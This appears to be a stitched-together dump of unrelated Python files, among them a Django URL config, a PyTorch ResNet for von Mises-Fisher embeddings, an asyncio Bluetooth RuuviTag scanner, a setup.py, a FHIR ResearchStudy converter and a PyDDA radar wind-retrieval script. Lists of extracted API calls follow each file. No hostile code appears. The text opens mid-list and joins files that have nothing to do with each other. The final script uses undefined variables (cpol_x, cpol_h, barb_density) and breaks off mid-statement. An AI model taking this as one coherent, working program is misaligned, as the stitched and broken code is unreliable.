'import math\n'), ((24552, 24576), 'math.gamma', 'math.gamma', (['(1.0 / self.q)'], {}), '(1.0 / self.q)\n', (24562, 24576), False, 'import math\n'), ((24579, 24614), 'math.gamma', 'math.gamma', (['((1.0 + self.p) / self.p)'], {}), '((1.0 + self.p) / self.p)\n', (24589, 24614), False, 'import math\n'), ((24760, 24785), 'math.pow', 'math.pow', (['(4)', '(1.0 / self.q)'], {}), '(4, 1.0 / self.q)\n', (24768, 24785), False, 'import math\n'), ((24802, 24820), 'math.sqrt', 'math.sqrt', (['math.pi'], {}), '(math.pi)\n', (24811, 24820), False, 'import math\n'), ((24847, 24888), 'math.gamma', 'math.gamma', (['((2.0 + self.q) / (2 * self.q))'], {}), '((2.0 + self.q) / (2 * self.q))\n', (24857, 24888), False, 'import math\n'), ((24913, 24980), 'math.gamma', 'math.gamma', (['((self.p + self.p * self.q + self.q) / (self.p * self.q))'], {}), '((self.p + self.p * self.q + self.q) / (self.p * self.q))\n', (24923, 24980), False, 'import math\n'), ((25227, 25251), 'math.gamma', 'math.gamma', (['(3.0 / self.q)'], {}), '(3.0 / self.q)\n', (25237, 25251), False, 'import math\n'), ((25254, 25289), 'math.gamma', 'math.gamma', (['((1.0 + self.p) / self.p)'], {}), '((1.0 + self.p) / self.p)\n', (25264, 25289), False, 'import math\n'), ((25516, 25540), 'math.gamma', 'math.gamma', (['(3.0 / self.p)'], {}), '(3.0 / self.p)\n', (25526, 25540), False, 'import math\n'), ((25543, 25578), 'math.gamma', 'math.gamma', (['((1.0 + self.q) / self.q)'], {}), '((1.0 + self.q) / self.q)\n', (25553, 25578), False, 'import math\n'), ((7518, 7532), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (7527, 7532), False, 'import math\n'), ((7585, 7599), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (7594, 7599), False, 'import math\n'), ((7652, 7666), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (7661, 7666), False, 'import math\n'), ((7719, 7733), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (7728, 7733), False, 'import math\n'), ((8089, 8103), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (8098, 8103), False, 'import math\n'), ((8156, 8170), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (8165, 8170), False, 'import math\n'), ((8223, 8237), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (8232, 8237), False, 'import math\n'), ((8290, 8304), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (8299, 8304), False, 'import math\n'), ((14219, 14236), 'math.sin', 'math.sin', (['_thetaG'], {}), '(_thetaG)\n', (14227, 14236), False, 'import math\n')]
|
from django.conf.urls import url, include
from rest_framework import routers
from crm_inbox.flows import * # noqa
from processlib.views import (ProcessViewSet)
router = routers.DefaultRouter()
router.register('process', ProcessViewSet)
urlpatterns = [
url(r'^process/', include('processlib.urls', namespace='processlib')),
url(r'^api/', include(router.urls)),
]
|
[
"django.conf.urls.include",
"rest_framework.routers.DefaultRouter"
] |
[((173, 196), 'rest_framework.routers.DefaultRouter', 'routers.DefaultRouter', ([], {}), '()\n', (194, 196), False, 'from rest_framework import routers\n'), ((280, 330), 'django.conf.urls.include', 'include', (['"""processlib.urls"""'], {'namespace': '"""processlib"""'}), "('processlib.urls', namespace='processlib')\n", (287, 330), False, 'from django.conf.urls import url, include\n'), ((351, 371), 'django.conf.urls.include', 'include', (['router.urls'], {}), '(router.urls)\n', (358, 371), False, 'from django.conf.urls import url, include\n')]
|
from dynaconf import settings
from app import create_app
application = create_app()
# runs this only when the environment is 'development'
if settings.ENVIRONMENT == "development" and settings.GUNICORN is False:
application.run(host="0.0.0.0", port=settings.FLASK_CONFIG.PORT, debug=True)
|
[
"app.create_app"
] |
[((73, 85), 'app.create_app', 'create_app', ([], {}), '()\n', (83, 85), False, 'from app import create_app\n')]
|
# coding=utf-8
# Copyright 2021 The vMF Embeddings Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class for instantiating a ResNet in PyTorch.
Code adapted from:
https://github.com/jeromerony/dml_cross_entropy/blob/master/models/base_model.py
https://github.com/jeromerony/dml_cross_entropy/blob/master/models/architectures/resnet.py
"""
import logging
import torch.nn as nn
from torchvision.models import resnet
from torchvision.models.utils import load_state_dict_from_url
from vmf_embeddings.archs import arch
from vmf_embeddings.archs import utils
log = logging.getLogger("main")
class ResNet(arch.Arch):
"""Class for defining a ResNet architecture."""
def __init__(
self,
n_classes,
embedding_dim,
set_bn_eval,
first_conv_3x3,
use_vmf,
learn_temp,
init_temp,
kappa_confidence,
block,
layers,
groups=1,
width_per_group=64,
replace_stride_with_dilation=None,
):
"""Initializes a ResNet architecture object. See arguments in arch.py."""
super(ResNet, self).__init__(embedding_dim, n_classes, use_vmf, learn_temp,
init_temp, kappa_confidence)
self.backbone_features = 512 * block.expansion
self._norm_layer = nn.BatchNorm2d
# Fixes batch-norm to eval mode during training
self.set_bn_eval = set_bn_eval
# Make first convolution use a 3x3 kernel for CIFAR datasets
self.first_conv_3x3 = first_conv_3x3
# Linear layer that remaps from the backbone output of ResNet
# to the embedding dimensionality
self.remap = nn.Linear(self.backbone_features, self.embedding_dim)
nn.init.zeros_(self.remap.bias)
self.classifier = nn.Linear(self.embedding_dim, self.n_classes, bias=False)
if self.use_vmf:
# This is the empirical approximation for initialization the vMF
# distributions for each class in the final layer.
utils.vmf_class_weight_init(self.classifier.weight, self.kappa_confidence,
self.embedding_dim)
self.inplanes = 64
self.dilation = 1
if replace_stride_with_dilation is None:
# Each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError(
"replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
if self.first_conv_3x3:
self.conv1 = nn.Conv2d(
3, self.inplanes, kernel_size=3, stride=1, padding=1, bias=False)
else:
self.conv1 = nn.Conv2d(
3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = self._norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(
block, 128, layers[1], stride=2, dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(
block, 256, layers[2], stride=2, dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(
block, 512, layers[3], stride=2, dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode="fan_out", nonlinearity="relu")
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-init
for m in self.modules():
if isinstance(m, resnet.Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, resnet.BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
resnet.conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(
block(
self.inplanes,
planes,
stride,
downsample,
self.groups,
self.base_width,
previous_dilation,
norm_layer,
))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(
block(
self.inplanes,
planes,
groups=self.groups,
base_width=self.base_width,
dilation=self.dilation,
norm_layer=norm_layer,
))
return nn.Sequential(*layers)
def create_encoder(self):
self.encoder = nn.Sequential(
self.conv1,
self.bn1,
self.relu,
self.maxpool,
self.layer1,
self.layer2,
self.layer3,
self.layer4,
self.avgpool,
utils.Flatten(),
self.remap,
self.classifier,
)
def train(self, mode=True):
"""Sets the module in training mode.
This has any effect only on certain modules. See documentations of
particular modules for details of their behaviors in training/evaluation
mode, if they are affected, e.g. :class:`Dropout`, :class:`BatchNorm`, etc.
Args:
mode: whether to set training mode ("True") or evaluation mode ("False").
Returns:
self
"""
self.training = mode
for module in self.children():
module.train(mode)
if self.set_bn_eval:
for module in self.modules():
if isinstance(module, nn.BatchNorm2d):
module.eval()
return self
def _resnet(
arch_name,
block,
layers,
pretrained,
progress,
n_classes,
embedding_dim,
set_bn_eval,
first_conv_3x3,
use_vmf,
learn_temp,
init_temp,
kappa_confidence,
):
"""Instantiates a ResNet model."""
model = ResNet(
n_classes,
embedding_dim,
set_bn_eval,
first_conv_3x3,
use_vmf,
learn_temp,
init_temp,
kappa_confidence,
block,
layers,
)
if pretrained:
log.info("Loading ResNet50 from Pytorch pretrained")
state_dict = load_state_dict_from_url(
resnet.model_urls[arch_name], progress=progress)
model.load_state_dict(state_dict, strict=False)
model.create_encoder()
return model
def resnet50(
n_classes,
embedding_dim,
set_bn_eval,
pretrained,
first_conv_3x3,
use_vmf,
learn_temp,
init_temp,
kappa_confidence,
progress=False,
):
"""ResNet-50 model from "Deep Residual Learning for Image Recognition"."""
return _resnet(
"resnet50",
resnet.Bottleneck,
[3, 4, 6, 3],
pretrained,
progress,
n_classes,
embedding_dim,
set_bn_eval,
first_conv_3x3,
use_vmf,
learn_temp,
init_temp,
kappa_confidence,
)
|
[
"torch.nn.AdaptiveAvgPool2d",
"torch.nn.ReLU",
"torch.nn.init.kaiming_normal_",
"torch.nn.Sequential",
"torch.nn.Conv2d",
"torchvision.models.resnet.conv1x1",
"vmf_embeddings.archs.utils.Flatten",
"torch.nn.init.zeros_",
"vmf_embeddings.archs.utils.vmf_class_weight_init",
"torch.nn.init.constant_",
"torchvision.models.utils.load_state_dict_from_url",
"torch.nn.Linear",
"torch.nn.MaxPool2d",
"logging.getLogger"
] |
[((1083, 1108), 'logging.getLogger', 'logging.getLogger', (['"""main"""'], {}), "('main')\n", (1100, 1108), False, 'import logging\n'), ((2109, 2162), 'torch.nn.Linear', 'nn.Linear', (['self.backbone_features', 'self.embedding_dim'], {}), '(self.backbone_features, self.embedding_dim)\n', (2118, 2162), True, 'import torch.nn as nn\n'), ((2167, 2198), 'torch.nn.init.zeros_', 'nn.init.zeros_', (['self.remap.bias'], {}), '(self.remap.bias)\n', (2181, 2198), True, 'import torch.nn as nn\n'), ((2222, 2279), 'torch.nn.Linear', 'nn.Linear', (['self.embedding_dim', 'self.n_classes'], {'bias': '(False)'}), '(self.embedding_dim, self.n_classes, bias=False)\n', (2231, 2279), True, 'import torch.nn as nn\n'), ((3423, 3444), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (3430, 3444), True, 'import torch.nn as nn\n'), ((3464, 3512), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', ([], {'kernel_size': '(3)', 'stride': '(2)', 'padding': '(1)'}), '(kernel_size=3, stride=2, padding=1)\n', (3476, 3512), True, 'import torch.nn as nn\n'), ((3940, 3968), 'torch.nn.AdaptiveAvgPool2d', 'nn.AdaptiveAvgPool2d', (['(1, 1)'], {}), '((1, 1))\n', (3960, 3968), True, 'import torch.nn as nn\n'), ((5529, 5551), 'torch.nn.Sequential', 'nn.Sequential', (['*layers'], {}), '(*layers)\n', (5542, 5551), True, 'import torch.nn as nn\n'), ((7088, 7161), 'torchvision.models.utils.load_state_dict_from_url', 'load_state_dict_from_url', (['resnet.model_urls[arch_name]'], {'progress': 'progress'}), '(resnet.model_urls[arch_name], progress=progress)\n', (7112, 7161), False, 'from torchvision.models.utils import load_state_dict_from_url\n'), ((2436, 2534), 'vmf_embeddings.archs.utils.vmf_class_weight_init', 'utils.vmf_class_weight_init', (['self.classifier.weight', 'self.kappa_confidence', 'self.embedding_dim'], {}), '(self.classifier.weight, self.kappa_confidence,\n self.embedding_dim)\n', (2463, 2534), False, 'from vmf_embeddings.archs import utils\n'), ((3156, 3231), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', 'self.inplanes'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)', 'bias': '(False)'}), '(3, self.inplanes, kernel_size=3, stride=1, padding=1, bias=False)\n', (3165, 3231), True, 'import torch.nn as nn\n'), ((3272, 3347), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', 'self.inplanes'], {'kernel_size': '(7)', 'stride': '(2)', 'padding': '(3)', 'bias': '(False)'}), '(3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)\n', (3281, 3347), True, 'import torch.nn as nn\n'), ((5808, 5823), 'vmf_embeddings.archs.utils.Flatten', 'utils.Flatten', ([], {}), '()\n', (5821, 5823), False, 'from vmf_embeddings.archs import utils\n'), ((4042, 4112), 'torch.nn.init.kaiming_normal_', 'nn.init.kaiming_normal_', (['m.weight'], {'mode': '"""fan_out"""', 'nonlinearity': '"""relu"""'}), "(m.weight, mode='fan_out', nonlinearity='relu')\n", (4065, 4112), True, 'import torch.nn as nn\n'), ((4344, 4378), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.bn3.weight', '(0)'], {}), '(m.bn3.weight, 0)\n', (4361, 4378), True, 'import torch.nn as nn\n'), ((4805, 4868), 'torchvision.models.resnet.conv1x1', 'resnet.conv1x1', (['self.inplanes', '(planes * block.expansion)', 'stride'], {}), '(self.inplanes, planes * block.expansion, stride)\n', (4819, 4868), False, 'from torchvision.models import resnet\n'), ((4179, 4209), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.weight', '(1)'], {}), '(m.weight, 1)\n', (4196, 4209), True, 'import torch.nn as nn\n'), ((4218, 4246), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.bias', '(0)'], {}), '(m.bias, 0)\n', (4235, 4246), True, 'import torch.nn as nn\n'), ((4432, 4466), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.bn2.weight', '(0)'], {}), '(m.bn2.weight, 0)\n', (4449, 4466), True, 'import torch.nn as nn\n')]
|
# coding=utf-8
# !/usr/bin/python3
# Name: aioruuvitag_bleak - Bluetooth Low Energy platform Agnostic Klient by <NAME>
# https://github.com/hbldh/bleak.git
# Copyright: (c) 2019 TK
# Licence: MIT
#
# sudo apt install bluez
# requires bluez 5.43
# ------------------------------------------------------------------------------
import logging
logger = logging.getLogger('ruuvitag')
import asyncio
from contextlib import suppress
from datetime import datetime as _dt, timedelta as _td
import platform
if platform.system() == 'Windows':
from .scanner_windows import scanner as _scanner
elif platform.system() == 'Linux':
from .scanner_linux import scanner as _scanner
from .ruuvitag_misc import hex_string, get_sec
from .ble_data import BLEData
# ===============================================================================
class ruuvitag_bleak(object):
SCHEDULER_MAX_INSTANCES = 5
HCICONFIG_CMD = '/bin/hciconfig'
#-------------------------------------------------------------------------------
def __init__(self,*,
loop,
callback,
scheduler=None,
device='hci0',
mfids=None,
device_reset=False,
device_timeout=10.0,
**kwargs
):
logger.info(f'>>> device:{device}')
if not loop:
raise ValueError(f'loop is None')
self._loop = loop
if not callback:
raise ValueError(f'callback is None')
self._callback = callback
self._stopevent = asyncio.Event()
self._scheduler = scheduler
self._mfids = mfids
self._device_reset = device_reset
self._device_timeout = device_timeout
self._device = device
self._data_ts = 0
self._inqueue = asyncio.Queue()
self._scanner_stop = None
self._scanner_task = None
logger.info(f'>>> {self} initialized')
# -------------------------------------------------------------------------------
def __repr__(self):
return f'ruuvitag_bleak device:{self._device} mfids:{self._mfids} reset:{self._device_reset} timeout:{self._device_timeout}'
#-------------------------------------------------------------------------------
def _schedule(self):
"""
Initializes scheduler for hci device nodata checking
"""
logger.debug(f'>>> enter {type(self._scheduler)} device_timeout:{self._device_timeout}')
if not self._scheduler:
return
if self._device_timeout:
l_jobid = f'bleak_timeout'
try:
self._scheduler.add_job(
self._do_bleak_timeout,
'interval',
seconds = 1,
kwargs = {
'jobid': l_jobid,
'reset': self._device_reset
},
id = l_jobid,
replace_existing = True,
max_instances = self.SCHEDULER_MAX_INSTANCES,
coalesce = True,
next_run_time = _dt.now()+_td(seconds=self._device_timeout)
)
logger.info(f'>>> jobid:{l_jobid} scheduled')
except:
logger.exception(f'>>> jobid:{l_jobid}')
#-------------------------------------------------------------------------------
async def _do_bleak_timeout(self, *,
jobid,
reset=False
):
"""
Supervises reception of the bleak data
Restarts socket if no data received within device_timeout period
"""
l_now = get_sec()
if (l_now - self._data_ts) > self._device_timeout:
self._data_ts = l_now
logger.warning(f'>>> jobid:{jobid} device_timeout timer ({self._device_timeout}sec) expired')
try:
logger.info(f'>>> jobid:{jobid} restarting device:{self._device}')
try:
self._reset()
self._scanner_task = self._loop.create_task(_scanner(device=self._device, loop=self._loop, outqueue=self._inqueue, stopevent=self._scanner_stop))
except:
logger.exception(f'>>> exception')
pass
except:
logger.exception(f'>>> jobid:{jobid}')
# ------------------------------------------------------------------------------
async def _reset(self):
logger.debug(f'>>> device:{self._device}')
self._scanner_stop.set()
await asyncio.sleep(1.0)
if self._device_reset:
await self._shell_cmd(cmd=f'{self.HCICONFIG_CMD} {self._device} down')
await asyncio.sleep(1.0)
await self._shell_cmd(cmd=f'{self.HCICONFIG_CMD} {self._device} up')
await asyncio.sleep(1.0)
self._scanner_stop.clear()
# ------------------------------------------------------------------------------
async def _shell_cmd(self, *, cmd):
if platform.system() == 'Linux':
logger.info(f'>>> {cmd!r}')
l_proc = await asyncio.create_subprocess_shell(
cmd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE)
l_stdout, l_stderr = await l_proc.communicate()
logger.info(f'>>> {cmd!r} exited with {l_proc.returncode}')
if l_stdout:
logger.debug(f'>>> stdout: {l_stdout.decode()}')
if l_stderr:
logger.error(f'>>> stder: {l_stderr.decode()}')
# ------------------------------------------------------------------------------
async def _handle_data(self, *, data):
"""
Handles received data from the Bleak scanner
"""
if not data:
return
self._data_ts = get_sec()
try:
l_mdata = data.metadata['manufacturer_data']
for l_mfid in list(l_mdata.keys()):
if not self._mfids or l_mfid in self._mfids:
l_mfdata = l_mdata[l_mfid]
logger.debug(f'''>>> device:{self._device} mac:{data.address} rssi:{data.rssi} mfid:{l_mfid} mflen:{len(l_mfdata)} mfdata:{hex_string(data=l_mfdata, filler='')}''')
try:
await self._callback(bledata=BLEData(
mac = data.address,
rssi = data.rssi,
mfid = l_mfid,
mfdata = l_mfdata,
rawdata = data
))
except:
logger.exception(f'>>> exception')
pass
except:
logger.exception(f'>>> exception')
pass
# -------------------------------------------------------------------------------
async def run(self):
logger.info(f'>>> starting...')
try:
self._scanner_stop = asyncio.Event()
self._scanner_task = self._loop.create_task(_scanner(device=self._device, loop=self._loop, outqueue=self._inqueue, stopevent=self._scanner_stop))
self._schedule()
except:
logger.exception(f'>>> exception')
raise
while not self._stopevent.is_set():
try:
if (self._inqueue):
await self._handle_data(data=await self._inqueue.get())
else:
await asyncio.sleep(100)
except GeneratorExit:
logger.error(f'>>> GeneratorExit')
self._stopevent.set()
break
except asyncio.CancelledError:
self._stopevent.set()
logger.warning(f'>>> CanceledError')
break
except:
logger.exception(f'>>> exception')
break
# l_task.cancel()
# with suppress(asyncio.CancelledError):
# self._loop.run_until_complete(l_task)
self._scanner_stop.set()
await asyncio.sleep(0.2)
logger.info('>>> bleak completed')
return True
# -------------------------------------------------------------------------------
def stop(self):
logger.info(f'>>> bleak')
self._stopevent.set()
|
[
"asyncio.sleep",
"asyncio.Event",
"datetime.datetime.now",
"datetime.timedelta",
"platform.system",
"asyncio.create_subprocess_shell",
"asyncio.Queue",
"logging.getLogger"
] |
[((400, 429), 'logging.getLogger', 'logging.getLogger', (['"""ruuvitag"""'], {}), "('ruuvitag')\n", (417, 429), False, 'import logging\n'), ((553, 570), 'platform.system', 'platform.system', ([], {}), '()\n', (568, 570), False, 'import platform\n'), ((643, 660), 'platform.system', 'platform.system', ([], {}), '()\n', (658, 660), False, 'import platform\n'), ((1563, 1578), 'asyncio.Event', 'asyncio.Event', ([], {}), '()\n', (1576, 1578), False, 'import asyncio\n'), ((1813, 1828), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (1826, 1828), False, 'import asyncio\n'), ((4576, 4594), 'asyncio.sleep', 'asyncio.sleep', (['(1.0)'], {}), '(1.0)\n', (4589, 4594), False, 'import asyncio\n'), ((5032, 5049), 'platform.system', 'platform.system', ([], {}), '()\n', (5047, 5049), False, 'import platform\n'), ((7012, 7027), 'asyncio.Event', 'asyncio.Event', ([], {}), '()\n', (7025, 7027), False, 'import asyncio\n'), ((8106, 8124), 'asyncio.sleep', 'asyncio.sleep', (['(0.2)'], {}), '(0.2)\n', (8119, 8124), False, 'import asyncio\n'), ((4727, 4745), 'asyncio.sleep', 'asyncio.sleep', (['(1.0)'], {}), '(1.0)\n', (4740, 4745), False, 'import asyncio\n'), ((4845, 4863), 'asyncio.sleep', 'asyncio.sleep', (['(1.0)'], {}), '(1.0)\n', (4858, 4863), False, 'import asyncio\n'), ((5129, 5234), 'asyncio.create_subprocess_shell', 'asyncio.create_subprocess_shell', (['cmd'], {'stdout': 'asyncio.subprocess.PIPE', 'stderr': 'asyncio.subprocess.PIPE'}), '(cmd, stdout=asyncio.subprocess.PIPE, stderr\n =asyncio.subprocess.PIPE)\n', (5160, 5234), False, 'import asyncio\n'), ((7518, 7536), 'asyncio.sleep', 'asyncio.sleep', (['(100)'], {}), '(100)\n', (7531, 7536), False, 'import asyncio\n'), ((3132, 3141), 'datetime.datetime.now', '_dt.now', ([], {}), '()\n', (3139, 3141), True, 'from datetime import datetime as _dt, timedelta as _td\n'), ((3142, 3175), 'datetime.timedelta', '_td', ([], {'seconds': 'self._device_timeout'}), '(seconds=self._device_timeout)\n', (3145, 3175), True, 'from datetime import datetime as _dt, timedelta as _td\n')]
|
import os
import setuptools
from rex import __version__
readme_filepath = os.path.join(os.path.dirname(os.path.abspath(__file__)), "README.md")
with open(readme_filepath, "r") as fh:
long_description = fh.read()
setuptools.setup(
name="pytorch-rex",
version=__version__,
author="<NAME>",
author_email="<EMAIL>",
description="A toolkit for Relation Extraction and more...",
long_description_content_type="text/markdown",
long_description=long_description,
url="https://github.com/Spico197/REx",
packages=setuptools.find_packages(exclude=["tests", "tests.*", "docs", "docs.*"]),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.7",
install_requires=[
"numpy>=1.19.0",
"scikit-learn>=0.21.3",
"omegaconf>=2.0.6",
"loguru==0.5.3",
"tqdm==4.61.1",
],
# package_data={
# 'rex' : [
# 'models/*.pth'
# ],
# },
# include_package_data=True,
)
|
[
"os.path.abspath",
"setuptools.find_packages"
] |
[((106, 131), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (121, 131), False, 'import os\n'), ((548, 620), 'setuptools.find_packages', 'setuptools.find_packages', ([], {'exclude': "['tests', 'tests.*', 'docs', 'docs.*']"}), "(exclude=['tests', 'tests.*', 'docs', 'docs.*'])\n", (572, 620), False, 'import setuptools\n')]
|
"""
This module converts Kids First studies to FHIR kfdrc-research-study
(derived from FHIR ResearchStudy).
"""
from kf_lib_data_ingest.common.concept_schema import CONCEPT
from common.utils import make_identifier, make_select, get
RESOURCE_TYPE = "ResearchStudy"
def yield_kfdrc_research_studies(
eng, table, target_service_id, organizations, practitioner_roles, groups
):
for row in make_select(
eng,
table,
CONCEPT.STUDY.ID,
CONCEPT.INVESTIGATOR.INSTITUTION,
CONCEPT.INVESTIGATOR.NAME,
CONCEPT.STUDY.ATTRIBUTION,
CONCEPT.STUDY.SHORT_NAME,
CONCEPT.STUDY.AUTHORITY,
CONCEPT.STUDY.NAME,
):
study_id = get(row, CONCEPT.STUDY.ID)
institution = get(row, CONCEPT.INVESTIGATOR.INSTITUTION)
investigator_name = get(row, CONCEPT.INVESTIGATOR.NAME)
study_name = get(row, CONCEPT.STUDY.NAME)
attribution = get(row, CONCEPT.STUDY.ATTRIBUTION)
short_name = get(row, CONCEPT.STUDY.SHORT_NAME)
if not all((study_id, institution, investigator_name, study_name)):
continue
retval = {
"resourceType": RESOURCE_TYPE,
"id": make_identifier(RESOURCE_TYPE, study_id),
"meta": {
"profile": [
"http://fhir.kids-first.io/StructureDefinition/kfdrc-research-study"
]
},
"identifier": [
{
"system": "https://kf-api-dataservice.kidsfirstdrc.org/studies",
"value": target_service_id,
},
{
"system": "https://kf-api-dataservice.kidsfirstdrc.org/studies?external_id=",
"value": study_id,
},
],
"extension": [
{
"url": "http://fhir.kids-first.io/StructureDefinition/related-organization",
"extension": [
{
"url": "organization",
"valueReference": {
"reference": f'Organization/{organizations[institution]["id"]}'
},
}
],
}
],
"title": study_name,
"status": "completed",
"principalInvestigator": {
"reference": f'PractitionerRole/{practitioner_roles[(institution, investigator_name)]["id"]}'
},
}
if attribution:
retval["identifier"].append({"value": attribution})
if short_name:
retval["extension"].append(
{
"url": "http://fhir.kids-first.io/StructureDefinition/display-name",
"valueString": short_name,
}
)
if groups:
retval["enrollment"] = [
{"reference": f'Group/{group["id"]}'}
for group in groups.values()
]
yield retval
|
[
"common.utils.make_identifier",
"common.utils.make_select",
"common.utils.get"
] |
[((396, 605), 'common.utils.make_select', 'make_select', (['eng', 'table', 'CONCEPT.STUDY.ID', 'CONCEPT.INVESTIGATOR.INSTITUTION', 'CONCEPT.INVESTIGATOR.NAME', 'CONCEPT.STUDY.ATTRIBUTION', 'CONCEPT.STUDY.SHORT_NAME', 'CONCEPT.STUDY.AUTHORITY', 'CONCEPT.STUDY.NAME'], {}), '(eng, table, CONCEPT.STUDY.ID, CONCEPT.INVESTIGATOR.INSTITUTION,\n CONCEPT.INVESTIGATOR.NAME, CONCEPT.STUDY.ATTRIBUTION, CONCEPT.STUDY.\n SHORT_NAME, CONCEPT.STUDY.AUTHORITY, CONCEPT.STUDY.NAME)\n', (407, 605), False, 'from common.utils import make_identifier, make_select, get\n'), ((696, 722), 'common.utils.get', 'get', (['row', 'CONCEPT.STUDY.ID'], {}), '(row, CONCEPT.STUDY.ID)\n', (699, 722), False, 'from common.utils import make_identifier, make_select, get\n'), ((745, 787), 'common.utils.get', 'get', (['row', 'CONCEPT.INVESTIGATOR.INSTITUTION'], {}), '(row, CONCEPT.INVESTIGATOR.INSTITUTION)\n', (748, 787), False, 'from common.utils import make_identifier, make_select, get\n'), ((816, 851), 'common.utils.get', 'get', (['row', 'CONCEPT.INVESTIGATOR.NAME'], {}), '(row, CONCEPT.INVESTIGATOR.NAME)\n', (819, 851), False, 'from common.utils import make_identifier, make_select, get\n'), ((873, 901), 'common.utils.get', 'get', (['row', 'CONCEPT.STUDY.NAME'], {}), '(row, CONCEPT.STUDY.NAME)\n', (876, 901), False, 'from common.utils import make_identifier, make_select, get\n'), ((924, 959), 'common.utils.get', 'get', (['row', 'CONCEPT.STUDY.ATTRIBUTION'], {}), '(row, CONCEPT.STUDY.ATTRIBUTION)\n', (927, 959), False, 'from common.utils import make_identifier, make_select, get\n'), ((981, 1015), 'common.utils.get', 'get', (['row', 'CONCEPT.STUDY.SHORT_NAME'], {}), '(row, CONCEPT.STUDY.SHORT_NAME)\n', (984, 1015), False, 'from common.utils import make_identifier, make_select, get\n'), ((1195, 1235), 'common.utils.make_identifier', 'make_identifier', (['RESOURCE_TYPE', 'study_id'], {}), '(RESOURCE_TYPE, study_id)\n', (1210, 1235), False, 'from common.utils import make_identifier, make_select, get\n')]
|
import pyart
import pydda
from matplotlib import pyplot as plt
import numpy as np
berr_grid = pyart.io.read_grid("berr_Darwin_hires.nc")
cpol_grid = pyart.io.read_grid("cpol_Darwin_hires.nc")
sounding = pyart.io.read_arm_sonde(
"/home/rjackson/data/soundings/twpsondewnpnC3.b1.20060119.231600.custom.cdf")
print(berr_grid.projection)
print(cpol_grid.get_projparams())
u_back = sounding[1].u_wind
v_back = sounding[1].v_wind
z_back = sounding[1].height
#u_init, v_init, w_init = pydda.retrieval.make_constant_wind_field(cpol_grid, wind=(0.0,0.0,0.0), vel_field='VT')
u_init, v_init, w_init = pydda.retrieval.make_wind_field_from_profile(cpol_grid, sounding, vel_field='VT')
#u_init, v_init, w_init = pydda.retrieval.make_test_divergence_field(
# cpol_grid, 30, 9.0, 15e3, 20e3, 5, 0, -20e3, 0)
# Test mass continuity by putting convergence at surface and divergence aloft
berr_grid.fields['DT']['data'] = cpol_grid.fields['DT']['data']
# Step 1 - do iterations with just data
Grids = pydda.retrieval.get_dd_wind_field([berr_grid, cpol_grid], u_init,
v_init, w_init,u_back=u_back,
v_back=v_back, z_back=z_back,
Co=100.0, Cm=1500.0, vel_name='VT',
refl_field='DT', frz=5000.0,
filt_iterations=0,
mask_w_outside_opt=False)
plt.figure(figsize=(8,8))
pydda.vis.plot_horiz_xsection_barbs(Grids, 'DT', level=6,
vel_contours=[1, 4, 10])
plt.interactive(False)
cpol_z = cpol_grid.fields['DT']['data']
lat_level=45
plt.figure(figsize=(10,10))
plt.pcolormesh(cpol_x[::,lat_level,::], cpol_h[::,lat_level,::],
cpol_z[::,lat_level,::],
cmap=pyart.graph.cm_colorblind.HomeyerRainbow)
plt.colorbar(label='Z [dBZ]')
plt.barbs(cpol_x[::barb_density_vert,lat_level,::barb_density],
